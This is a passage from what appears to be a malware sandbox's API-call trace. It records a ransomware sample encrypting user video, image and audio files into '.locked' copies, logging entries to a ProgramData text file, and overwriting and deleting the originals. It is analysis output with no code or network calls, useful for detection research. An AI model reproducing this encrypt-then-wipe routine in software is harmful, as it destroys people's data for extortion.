SetEvent (hEvent=0x14c) returned 1 [0320.863] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0320.943] SetEvent (hEvent=0x1dc) returned 1 [0320.943] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0320.949] SetEvent (hEvent=0x14c) returned 1 [0320.949] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0320.954] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12659a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x12659a24*=0xc) returned 1 [0320.989] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\jJ4i0R21 OaZxd.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\jj4i0r21 oazxd.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0320.989] GetConsoleMode (in: hConsoleHandle=0x240, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0320.990] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\jJ4i0R21 OaZxd.avi.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\jj4i0r21 oazxd.avi.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0320.990] GetConsoleMode (in: hConsoleHandle=0x1f8, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0320.990] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c220 | out: pbBuffer=0x1234c220) returned 1 [0320.990] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e040 | out: pbBuffer=0x1234e040) returned 1 [0320.990] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0320.991] WriteFile (in: hFile=0x1f8, lpBuffer=0x126ad000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12659d78, lpOverlapped=0x0 | out: lpBuffer=0x126ad000*, lpNumberOfBytesWritten=0x12659d78*=0x80, lpOverlapped=0x0) returned 1 [0320.993] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0320.997] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb30, ulNumEntriesRemoved=0x33f6fb10) returned 0 [0320.997] SetEvent (hEvent=0x150) returned 1 [0320.997] SetEvent (hEvent=0x22c) returned 1 [0320.997] SetEvent (hEvent=0x1dc) returned 1 [0320.997] SetEvent (hEvent=0x14c) returned 1 [0320.997] ReadFile (in: hFile=0x240, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12659d68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x12659d68*=0x2c67, lpOverlapped=0x0) returned 1 [0320.998] WriteFile (in: hFile=0x1f8, lpBuffer=0x13134000*, nNumberOfBytesToWrite=0x2c67, lpNumberOfBytesWritten=0x12659d74, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesWritten=0x12659d74*=0x2c67, lpOverlapped=0x0) returned 1 [0321.114] ReadFile (in: hFile=0x240, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12659d68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x12659d68*=0x0, lpOverlapped=0x0) returned 1 [0321.114] CloseHandle (hObject=0x1f8) returned 1 [0321.118] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0321.126] CloseHandle (hObject=0x240) returned 1 [0321.126] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0321.127] GetConsoleMode (in: hConsoleHandle=0x240, lpMode=0x12659e94 | out: lpMode=0x12659e94) returned 0 [0321.127] WriteFile (in: hFile=0x240, lpBuffer=0x126701c0*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x12659e64, lpOverlapped=0x0 | out: lpBuffer=0x126701c0*, lpNumberOfBytesWritten=0x12659e64*=0x35, lpOverlapped=0x0) returned 1 [0321.127] CloseHandle (hObject=0x240) returned 1 [0321.127] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\jJ4i0R21 OaZxd.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\jj4i0r21 oazxd.avi")) returned 1 [0321.209] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0321.225] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0321.226] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb30, ulNumEntriesRemoved=0x33f6fb10) returned 0 [0321.226] SetEvent (hEvent=0x150) returned 1 [0321.226] SetEvent (hEvent=0x14c) returned 1 [0321.241] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0321.245] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0321.245] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0321.246] SetEvent (hEvent=0x12c) returned 1 [0321.246] SetEvent (hEvent=0x184) returned 1 [0321.246] SetEvent (hEvent=0x190) returned 1 [0321.246] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0321.247] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0321.247] SetEvent (hEvent=0x190) returned 1 [0321.249] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0321.249] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb30, ulNumEntriesRemoved=0x33f6fb10) returned 0 [0321.249] SetEvent (hEvent=0x150) returned 1 [0321.249] SetEvent (hEvent=0x190) returned 1 [0321.250] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\jJ4i0R21 OaZxd.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\jj4i0r21 oazxd.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0321.251] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125e5e88 | out: lpMode=0x125e5e88) returned 0 [0321.251] WriteFile (in: hFile=0x1e0, lpBuffer=0x17b0e000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e5e78, lpOverlapped=0x0 | out: lpBuffer=0x17b0e000*, lpNumberOfBytesWritten=0x125e5e78*=0xfa000, lpOverlapped=0x0) returned 1 [0321.316] CloseHandle (hObject=0x1e0) returned 1 [0321.316] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\jJ4i0R21 OaZxd.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\jj4i0r21 oazxd.avi")) returned 1 [0321.324] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0321.371] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0321.380] SetEvent (hEvent=0x14c) returned 1 [0321.380] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0321.392] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0321.393] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0321.393] SetEvent (hEvent=0x190) returned 1 [0321.393] SetEvent (hEvent=0x14c) returned 1 [0321.393] SetEvent (hEvent=0x184) returned 1 [0321.393] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0321.394] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0321.394] SetEvent (hEvent=0x150) returned 1 [0321.394] SetEvent (hEvent=0x184) returned 1 [0321.398] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0321.398] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb30, ulNumEntriesRemoved=0x33f6fb10) returned 0 [0321.398] SetEvent (hEvent=0x184) returned 1 [0321.422] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\lhMzml c.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\lhmzml c.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0321.422] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1276ae88 | out: lpMode=0x1276ae88) returned 0 [0321.422] WriteFile (in: hFile=0x1e0, lpBuffer=0x187ee000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ae78, lpOverlapped=0x0 | out: lpBuffer=0x187ee000*, lpNumberOfBytesWritten=0x1276ae78*=0xfa000, lpOverlapped=0x0) returned 1 [0321.442] CloseHandle (hObject=0x1e0) returned 1 [0321.442] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\lhMzml c.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\lhmzml c.swf")) returned 1 [0321.447] SetEvent (hEvent=0x12c) returned 1 [0321.447] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0321.454] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) Thread: id = 446 os_tid = 0xee4 [0261.071] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x340aff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x340aff58*=0x1fc) returned 1 [0261.071] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x21c [0261.071] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0261.355] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0261.473] SetEvent (hEvent=0x1dc) returned 1 [0261.473] SetEvent (hEvent=0x20c) returned 1 [0261.473] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0261.819] SetEvent (hEvent=0x214) returned 1 [0261.819] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x1) returned 0x102 [0261.842] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0261.842] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x1) returned 0x102 [0261.846] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0261.846] SetEvent (hEvent=0x14c) returned 1 [0261.846] SetEvent (hEvent=0x214) returned 1 [0261.846] SetEvent (hEvent=0x1dc) returned 1 [0261.846] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0261.880] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x340afb34, ulCount=0x10, ulNumEntriesRemoved=0x340afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x340afb34, ulNumEntriesRemoved=0x340afb14) returned 0 [0261.880] SetEvent (hEvent=0x150) returned 1 [0261.880] SetEvent (hEvent=0x1dc) returned 1 [0261.880] SetEvent (hEvent=0x214) returned 1 [0261.880] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0261.880] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766030 | out: pbBuffer=0x12766030) returned 1 [0261.880] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0261.881] WriteFile (in: hFile=0x204, lpBuffer=0x12749000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12659d78, lpOverlapped=0x0 | out: lpBuffer=0x12749000*, lpNumberOfBytesWritten=0x12659d78*=0x80, lpOverlapped=0x0) returned 1 [0261.883] ReadFile (in: hFile=0x1c0, lpBuffer=0x1532a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12659d68, lpOverlapped=0x0 | out: lpBuffer=0x1532a000*, lpNumberOfBytesRead=0x12659d68*=0x1152d, lpOverlapped=0x0) returned 1 [0261.888] WriteFile (in: hFile=0x204, lpBuffer=0x1532a000*, nNumberOfBytesToWrite=0x1152d, lpNumberOfBytesWritten=0x12659d74, lpOverlapped=0x0 | out: lpBuffer=0x1532a000*, lpNumberOfBytesWritten=0x12659d74*=0x1152d, lpOverlapped=0x0) returned 1 [0261.904] ReadFile (in: hFile=0x1c0, lpBuffer=0x1532a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12659d68, lpOverlapped=0x0 | out: lpBuffer=0x1532a000*, lpNumberOfBytesRead=0x12659d68*=0x0, lpOverlapped=0x0) returned 1 [0261.904] CloseHandle (hObject=0x204) returned 1 [0261.911] CloseHandle (hObject=0x1c0) returned 1 [0261.911] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0261.911] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x12659e94 | out: lpMode=0x12659e94) returned 0 [0261.911] WriteFile (in: hFile=0x1c0, lpBuffer=0x1263c090*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x12659e64, lpOverlapped=0x0 | out: lpBuffer=0x1263c090*, lpNumberOfBytesWritten=0x12659e64*=0x2f, lpOverlapped=0x0) returned 1 [0261.911] CloseHandle (hObject=0x1c0) returned 1 [0261.912] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\dda kMB.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\dda kmb.jpg")) returned 1 [0261.921] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0262.784] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0262.879] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0262.947] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PG2AA8VgUaJQix3.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pg2aa8vguajqix3.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0263.011] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0265.662] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x1276fe88 | out: lpMode=0x1276fe88) returned 0 [0265.662] SetEvent (hEvent=0x1f0) returned 1 [0265.662] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0265.789] SetEvent (hEvent=0x1b8) returned 1 [0265.789] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0265.901] SetEvent (hEvent=0x104) returned 1 [0265.902] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0266.003] SetEvent (hEvent=0x190) returned 1 [0266.003] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0266.036] SetEvent (hEvent=0x14c) returned 1 [0266.036] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0269.426] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0269.426] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x123a3e94 | out: lpMode=0x123a3e94) returned 0 [0269.426] WriteFile (in: hFile=0x224, lpBuffer=0x12380340*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x123a3e64, lpOverlapped=0x0 | out: lpBuffer=0x12380340*, lpNumberOfBytesWritten=0x123a3e64*=0x31, lpOverlapped=0x0) returned 1 [0269.426] CloseHandle (hObject=0x224) returned 1 [0269.427] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PuTjWyxTe.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\putjwyxte.mp4")) returned 1 [0269.799] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PuTjWyxTe.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\putjwyxte.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0270.232] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0270.509] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x123a3e88 | out: lpMode=0x123a3e88) returned 0 [0270.509] WriteFile (in: hFile=0x1a4, lpBuffer=0x14a24000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x123a3e78, lpOverlapped=0x0 | out: lpBuffer=0x14a24000*, lpNumberOfBytesWritten=0x123a3e78*=0xfa000, lpOverlapped=0x0) returned 1 [0270.540] CloseHandle (hObject=0x1a4) returned 1 [0270.916] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0273.183] SetEvent (hEvent=0x12c) returned 1 [0273.183] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0273.482] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390020*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239fa24, lpReserved=0x0 | out: lpBuffer=0x12390020*, lpNumberOfCharsWritten=0x1239fa24*=0xb) returned 1 [0273.483] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\0C0imTxCn.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\0c0imtxcn.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0273.483] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0273.483] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\0C0imTxCn.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\0c0imtxcn.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0273.758] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0274.218] SetEvent (hEvent=0x1dc) returned 1 [0274.218] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0274.218] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0276.681] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0276.681] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0276.682] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0276.682] WriteFile (in: hFile=0x224, lpBuffer=0x12645000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239fd78, lpOverlapped=0x0 | out: lpBuffer=0x12645000*, lpNumberOfBytesWritten=0x1239fd78*=0x80, lpOverlapped=0x0) returned 1 [0276.685] ReadFile (in: hFile=0x1bc, lpBuffer=0x12e3c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x12e3c000*, lpNumberOfBytesRead=0x1239fd68*=0x16ed3, lpOverlapped=0x0) returned 1 [0276.692] WriteFile (in: hFile=0x224, lpBuffer=0x12e3c000*, nNumberOfBytesToWrite=0x16ed3, lpNumberOfBytesWritten=0x1239fd74, lpOverlapped=0x0 | out: lpBuffer=0x12e3c000*, lpNumberOfBytesWritten=0x1239fd74*=0x16ed3, lpOverlapped=0x0) returned 1 [0276.838] ReadFile (in: hFile=0x1bc, lpBuffer=0x12e3c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x12e3c000*, lpNumberOfBytesRead=0x1239fd68*=0x0, lpOverlapped=0x0) returned 1 [0276.838] CloseHandle (hObject=0x224) returned 1 [0276.846] CloseHandle (hObject=0x1bc) returned 1 [0276.846] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0276.846] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1239fe94 | out: lpMode=0x1239fe94) returned 0 [0276.846] WriteFile (in: hFile=0x1bc, lpBuffer=0x124940f0*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x1239fe64, lpOverlapped=0x0 | out: lpBuffer=0x124940f0*, lpNumberOfBytesWritten=0x1239fe64*=0x49, lpOverlapped=0x0) returned 1 [0276.847] CloseHandle (hObject=0x1bc) returned 1 [0276.848] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\0C0imTxCn.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\0c0imtxcn.mp3")) returned 1 [0276.883] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0278.046] SetEvent (hEvent=0x20c) returned 1 [0278.046] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0278.097] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0278.134] SetEvent (hEvent=0x220) returned 1 [0278.134] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0278.215] SetEvent (hEvent=0x184) returned 1 [0278.215] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0278.729] SetEvent (hEvent=0x1d0) returned 1 [0278.729] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0278.773] SetEvent (hEvent=0x1d0) returned 1 [0278.773] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0278.779] SetEvent (hEvent=0x184) returned 1 [0278.779] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0279.195] SetEvent (hEvent=0x20c) returned 1 [0279.195] SetEvent (hEvent=0x12c) returned 1 [0279.195] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0279.309] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0279.372] SetEvent (hEvent=0x134) returned 1 [0279.372] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0279.615] SetEvent (hEvent=0x1d0) returned 1 [0279.615] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0279.926] SetEvent (hEvent=0x214) returned 1 [0279.926] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0280.198] SetEvent (hEvent=0x1ac) returned 1 [0280.199] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0280.310] SetEvent (hEvent=0x14c) returned 1 [0280.310] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0280.364] SetEvent (hEvent=0x1ac) returned 1 [0280.364] SetEvent (hEvent=0x1dc) returned 1 [0280.364] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0280.456] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0280.483] SetEvent (hEvent=0x198) returned 1 [0280.483] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0282.231] SetEvent (hEvent=0x198) returned 1 [0282.231] SetEvent (hEvent=0x1b8) returned 1 [0282.231] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0282.401] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0282.458] SetEvent (hEvent=0x134) returned 1 [0282.458] SetEvent (hEvent=0x214) returned 1 [0282.458] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0282.655] SetEvent (hEvent=0x184) returned 1 [0282.655] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0283.413] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390020*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1265ba24, lpReserved=0x0 | out: lpBuffer=0x12390020*, lpNumberOfCharsWritten=0x1265ba24*=0xb) returned 1 [0283.551] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0283.586] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0283.635] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0283.699] SetEvent (hEvent=0x14c) returned 1 [0283.699] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0283.778] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239fa24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x1239fa24*=0xb) returned 1 [0283.797] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0284.497] SetEvent (hEvent=0x214) returned 1 [0284.497] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0284.506] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0284.943] SetEvent (hEvent=0x1ac) returned 1 [0284.943] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0285.003] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0285.145] CreateFileW 